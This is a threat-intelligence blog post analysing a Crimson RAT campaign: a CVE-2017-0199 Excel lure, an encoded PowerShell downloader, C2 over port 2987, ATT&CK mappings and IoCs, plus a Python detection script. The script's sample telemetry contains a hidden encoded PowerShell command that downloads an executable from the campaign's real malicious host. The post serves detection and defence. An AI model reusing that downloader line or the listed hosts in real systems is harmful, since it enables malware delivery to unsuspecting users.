Revive of Crimson RAT

Dinesh
3 min read · Jan 28, 2020


Crimson RAT was previously used by the Pakistan-based threat actor Transparent Tribe.

CrowdStrike has been tracking this threat actor under the name MYTHIC LEOPARD since 2016. According to their blog, MYTHIC LEOPARD is a Pakistan-based adversary with operations likely located in Karachi. The adversary uses social engineering and spear phishing to target Indian military and defense entities with Crimson RAT. FireEye tracks a similar threat actor named APT36 (also known as Lapis), a Pakistan-based cyber espionage group that supports Pakistani military and diplomatic interests and targets the Indian military and government with malware named SeedDoor.

Very few samples were uploaded to public malware repositories between June 2018 and January 2020. From mid-January 2020, quite a few samples triggered the YARA rules created to track the operation.

Analysis:

One such sample that hit the custom YARA rule was 69d4883858b44f0c41ba68493c389885, submitted on Jan 23, 2020 from a German IP address (possibly a VPN).

The file is a malicious Microsoft Office Excel document that leverages the CVE-2017-0199 vulnerability. This vulnerability allows an attacker to download and execute a Visual Basic script containing PowerShell commands when a user opens a document carrying the embedded exploit.

The Excel document runs a Base64-encoded PowerShell script.

The decoded PowerShell script reveals the URL contacted to download and execute the second-stage payload.

The downloaded executable establishes its command-and-control communication over the unusual port 2987.

Process flow:

  1. The Excel file leverages the CVE-2017-0199 vulnerability to run a PowerShell script.
  2. The PowerShell script downloads an executable from newsupdates[.]myftp[.]org.
  3. The executable connects to bjorn111[.]duckdns[.]org.
  4. The threat is identified as Crimson RAT (matching the Emerging Threats Pro signature ETPRO TROJAN MSIL/Crimson Receiving Command).

IoAs:

  • Execution: T1203 — Exploitation for Client Execution (CVE-2017-0199)
  • Execution: T1086 — PowerShell
  • Discovery: T1012 — Query Registry
  • Command and Control: T1105 — Remote File Copy
  • Command and Control: T1065 — Uncommonly Used Port (2987)

IoCs:

Hash

  • 6e0ba1b2e72d9a0682d1cdd27eea3980da04582bdef0080bf22f8809d172e229 (Downloader: Excel document)
  • d27474625cdc0c3456918edfa58bfaf910c8b98c6168a506ac14afc1a41fb58f (Dropped executable)

Domain

  • newsupdates[.]myftp[.]org
  • bjorn111[.]duckdns[.]org

IP

  • 108[.]62[.]12[.]134
  • 160[.]20[.]147[.]59
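The process flow and the IoC list above describe a chain that can be hunted for in endpoint telemetry: Excel spawning PowerShell with an encoded command, the decoded command fetching a payload from a listed domain, a dropped file matching a listed hash, and an outbound connection to a listed host on port 2987. The following script is an added example written for this post, not code from the original article or from any vendor tooling. It refangs the post's defanged indicators, decodes a PowerShell `-EncodedCommand` argument (Base64 of UTF-16LE), extracts URLs from the decoded script, and runs the checks over constructed sample events. The event layout, file paths, the `CONSTRUCTED` URL path and the `update.exe` file name are assumptions made up for the example; the hosts, IPs, hashes and port are the indicators published in the post.

```python
import base64
import re
from urllib.parse import urlparse

# Indicators as published in the post (defanged), refanged below for matching.
DEFANGED_DOMAINS = ("newsupdates[.]myftp[.]org", "bjorn111[.]duckdns[.]org")
DEFANGED_IPS = ("108[.]62[.]12[.]134", "160[.]20[.]147[.]59")
IOC_SHA256 = {
    "6e0ba1b2e72d9a0682d1cdd27eea3980da04582bdef0080bf22f8809d172e229",  # Excel downloader
    "d27474625cdc0c3456918edfa58bfaf910c8b98c6168a506ac14afc1a41fb58f",  # dropped executable
}
C2_PORT = 2987  # uncommon port noted in the post


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'a[.]b[.]c' or 'hxxp://...' back into a matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


IOC_HOSTS = {refang(d) for d in DEFANGED_DOMAINS} | {refang(i) for i in DEFANGED_IPS}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the argument is Base64.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script hidden in a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # -EncodedCommand is Base64 over the UTF-16LE bytes of the script.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build sample telemetry."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def triage(events):
    """Scan process, file and network events for the chain described in the post.

    Returns a list of (label, detail) findings, in event order.
    """
    findings = []
    for ev in events:
        if ev["type"] == "process":
            parent, image = ev["parent"].lower(), ev["image"].lower()
            if parent.endswith("excel.exe") and image.endswith("powershell.exe"):
                findings.append(("T1203/T1086", f"Excel spawned PowerShell: {ev['cmdline'][:50]}..."))
            script = decode_encoded_command(ev["cmdline"])
            if script:
                for url in URL_RE.findall(script):
                    tag = "known IoC" if host_of(url) in IOC_HOSTS else "unknown host"
                    findings.append(("T1105", f"encoded PowerShell fetches {url} ({tag})"))
        elif ev["type"] == "file":
            if ev["sha256"].lower() in IOC_SHA256:
                findings.append(("IoC hash", f"{ev['path']} matches published SHA-256"))
        elif ev["type"] == "network":
            dst = ev["dst"].lower()
            if dst in IOC_HOSTS:
                findings.append(("C2", f"{ev['image']} contacted IoC host {dst}:{ev['port']}"))
            if ev["port"] == C2_PORT:
                findings.append(("T1065", f"{ev['image']} used uncommon port {C2_PORT} to {dst}"))
    return findings


# Constructed sample telemetry modelled on the post's process flow. The URL path,
# file names and paths are invented; hosts, hashes and port come from the post.
SAMPLE_SCRIPT = ("(New-Object Net.WebClient).DownloadFile("
                 "'http://newsupdates.myftp.org/CONSTRUCTED/update.exe', "
                 "\"$env:TEMP\\update.exe\")")
SAMPLE_EVENTS = [
    {"type": "process", "parent": "C:\\Program Files\\Microsoft Office\\EXCEL.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT)},
    {"type": "file", "path": "C:\\Users\\user\\AppData\\Local\\Temp\\update.exe",
     "sha256": "d27474625cdc0c3456918edfa58bfaf910c8b98c6168a506ac14afc1a41fb58f"},
    {"type": "network", "image": "update.exe", "dst": "bjorn111.duckdns.org", "port": 2987},
    {"type": "network", "image": "chrome.exe", "dst": "example.com", "port": 443},  # benign noise
]

if __name__ == "__main__":
    for label, detail in triage(SAMPLE_EVENTS):
        print(f"[{label}] {detail}")
```

Running the block stand-alone prints one finding per stage of the chain for the constructed events and nothing for the benign browser connection. The port check is deliberately kept separate from the host check: a connection to an unlisted host on port 2987 still surfaces, which is what makes the uncommon-port IoA useful once the domains rotate.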

The return of Crimson RAT samples to public malware repositories might be due to operations observed in the wild using it.

Reference:

https://dinu13.home.blog/2020/01/29/revive-of-crimson-rat/


Dinesh

Threat Intelligence Analyst <Blogs are my own and do not reflect my employer>